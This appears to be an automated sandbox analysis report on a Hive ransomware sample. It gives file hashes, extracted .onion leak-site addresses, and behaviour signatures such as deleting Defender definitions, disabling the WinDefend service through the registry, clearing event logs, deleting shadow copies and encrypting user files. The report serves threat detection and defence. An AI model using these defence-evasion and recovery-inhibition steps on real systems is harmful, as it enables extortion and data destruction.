Analysis
-
max time kernel
125s -
max time network
136s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 13:50
Static task
static1
Behavioral task
behavioral1
Sample
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe
-
Size
2.8MB
-
MD5
eaca98262691a07d6251902bcbdc1083
-
SHA1
64cda1eb126efe6f2217a5a8a86baac17e09554d
-
SHA256
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
-
SHA512
d564fabffd1af3c798d3df293f7e945decb68243e0e015445ca470091c0fc1db8bcf7e1f8947d00791b3073e578f9edc50dbe1418672ccc71d9c130a34cb00ca
Malware Config
Extracted
C:\Program Files\7-Zip\8Axs_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3164 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 784 bcdedit.exe 3796 bcdedit.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\InvokeFormat.crw => C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-GB.Messaging.config 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-white\WideTile.scale-200.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\offsym.ttf 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jawt.h.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_UVyn7Mm4GMk0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-CN.respack 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\11c.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-white_scale-200.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_yeXTfF7BzeE0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_cPbqgL76v_w0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\MedTile.scale-100.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\8Axs_HOW_TO_DECRYPT.txt 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntry2019R_PrepidBypass-ul-oob.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_rbOb8yfpR8w0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_contrast-black.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-30_altform-unplated_contrast-black.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-150_contrast-black.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_tXn9_RTkT240.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\8Axs_HOW_TO_DECRYPT.txt 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\loc\AppXManifestLoc.16.en-us.xml.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_2O-2Ij_ntAU0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine\Data\3DBrush\round.obj 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\XMLOffKeys\Keys_OffVer11.xml 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\DC_HolderEarned.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.model 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\sat_logo_2x.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_X2wL5kDaBzA0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\particles.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsSmallTile.scale-100.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\LargeTile.scale-100.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\move.svg.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_MHnC96WEbYg0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_nzUSar87l7U0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansRegular.ttf.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_pFR13AOgdM40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\SampleHeader\news.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\Microsoft.Skype.ImageTool.winmd 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\8Axs_HOW_TO_DECRYPT.txt 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-actions.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_l9BsL1jRBfg0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f2\FA000000002.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_zowWnw_AT7U0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Selected_Hollow.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Heart_Shape.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\en-us\styles\wefgallerywinrt.css 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-16.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_HGilvL9AJ7k0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_G9ruX2evewQ0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-phn.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ZlgMA-MVcU40.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\5601_20x20x32.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-100_contrast-black.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_RoN1SH2G1Dc0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_scale-100.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-200_contrast-high.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-200.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ugPIFS3k0dg0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\COPYRIGHT.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_9QbfGGwxMIM0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ul.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_W4NVptDxCso0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-200.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\InkObj.dll.mui.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_k7BGafsBEMI0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\LockScreenLogo.scale-125.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\HeroAppTile.xml 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\ui-strings.js.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_pYDiTllFkqA0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_UtqH2eQYL340.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Resources\TopicPage\core.js 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-125.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-100.png 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_Lw1hbv692II0.nhuie 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 5104 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exepid process 520 powershell.exe 520 powershell.exe 520 powershell.exe 2916 powershell.exe 2916 powershell.exe 2916 powershell.exe 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 4120 wevtutil.exe Token: SeBackupPrivilege 4120 wevtutil.exe Token: SeSecurityPrivilege 2924 wevtutil.exe Token: SeBackupPrivilege 2924 wevtutil.exe Token: SeSecurityPrivilege 4004 wevtutil.exe Token: SeBackupPrivilege 4004 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4248 wmic.exe Token: SeSecurityPrivilege 4248 wmic.exe Token: SeTakeOwnershipPrivilege 4248 wmic.exe Token: SeLoadDriverPrivilege 4248 wmic.exe Token: SeSystemProfilePrivilege 4248 wmic.exe Token: SeSystemtimePrivilege 4248 wmic.exe Token: SeProfSingleProcessPrivilege 4248 wmic.exe Token: SeIncBasePriorityPrivilege 4248 wmic.exe Token: SeCreatePagefilePrivilege 4248 wmic.exe Token: SeBackupPrivilege 4248 wmic.exe Token: SeRestorePrivilege 4248 wmic.exe Token: SeShutdownPrivilege 4248 wmic.exe Token: SeDebugPrivilege 4248 wmic.exe Token: SeSystemEnvironmentPrivilege 4248 wmic.exe Token: SeRemoteShutdownPrivilege 4248 wmic.exe Token: SeUndockPrivilege 4248 wmic.exe Token: SeManageVolumePrivilege 4248 wmic.exe Token: 33 4248 wmic.exe Token: 34 4248 wmic.exe Token: 35 4248 wmic.exe Token: 36 4248 wmic.exe Token: SeIncreaseQuotaPrivilege 4360 wmic.exe Token: SeSecurityPrivilege 4360 wmic.exe Token: SeTakeOwnershipPrivilege 4360 wmic.exe Token: SeLoadDriverPrivilege 4360 wmic.exe Token: SeSystemProfilePrivilege 4360 wmic.exe Token: SeSystemtimePrivilege 4360 wmic.exe Token: SeProfSingleProcessPrivilege 4360 wmic.exe Token: SeIncBasePriorityPrivilege 4360 wmic.exe Token: SeCreatePagefilePrivilege 4360 wmic.exe Token: SeBackupPrivilege 4360 wmic.exe Token: SeRestorePrivilege 4360 wmic.exe Token: SeShutdownPrivilege 4360 wmic.exe Token: SeDebugPrivilege 4360 wmic.exe Token: SeSystemEnvironmentPrivilege 4360 wmic.exe Token: SeRemoteShutdownPrivilege 4360 wmic.exe Token: SeUndockPrivilege 4360 wmic.exe Token: SeManageVolumePrivilege 4360 wmic.exe Token: 33 4360 wmic.exe Token: 34 4360 wmic.exe Token: 35 4360 wmic.exe Token: 36 4360 wmic.exe Token: SeIncreaseQuotaPrivilege 4360 wmic.exe Token: SeSecurityPrivilege 4360 wmic.exe Token: SeTakeOwnershipPrivilege 4360 wmic.exe Token: SeLoadDriverPrivilege 4360 wmic.exe Token: SeSystemProfilePrivilege 4360 wmic.exe Token: SeSystemtimePrivilege 4360 wmic.exe Token: SeProfSingleProcessPrivilege 4360 wmic.exe Token: SeIncBasePriorityPrivilege 4360 wmic.exe Token: SeCreatePagefilePrivilege 4360 wmic.exe Token: SeBackupPrivilege 4360 wmic.exe Token: SeRestorePrivilege 4360 wmic.exe Token: SeShutdownPrivilege 4360 wmic.exe Token: SeDebugPrivilege 4360 wmic.exe Token: SeSystemEnvironmentPrivilege 4360 wmic.exe Token: SeRemoteShutdownPrivilege 4360 wmic.exe Token: SeUndockPrivilege 4360 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3440 wrote to memory of 3052 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 3052 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3052 wrote to memory of 3176 3052 net.exe net1.exe PID 3052 wrote to memory of 3176 3052 net.exe net1.exe PID 3440 wrote to memory of 4040 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 4040 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 4040 wrote to memory of 4080 4040 net.exe net1.exe PID 4040 wrote to memory of 4080 4040 net.exe net1.exe PID 3440 wrote to memory of 4300 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 4300 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 4300 wrote to memory of 4252 4300 net.exe net1.exe PID 4300 wrote to memory of 4252 4300 net.exe net1.exe PID 3440 wrote to memory of 4240 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 4240 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 4240 wrote to memory of 4376 4240 net.exe net1.exe PID 4240 wrote to memory of 4376 4240 net.exe net1.exe PID 3440 wrote to memory of 4432 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 4432 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 4432 wrote to memory of 4340 4432 net.exe net1.exe PID 4432 wrote to memory of 4340 4432 net.exe net1.exe PID 3440 wrote to memory of 4328 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 4328 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 4328 wrote to memory of 760 4328 net.exe net1.exe PID 4328 wrote to memory of 760 4328 net.exe net1.exe PID 3440 wrote to memory of 3232 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 wrote to memory of 3232 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3232 wrote to memory of 3808 3232 net.exe net1.exe PID 3232 wrote to memory of 3808 3232 net.exe net1.exe PID 3440 wrote to memory of 2136 3440 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe net.exe PID 3440 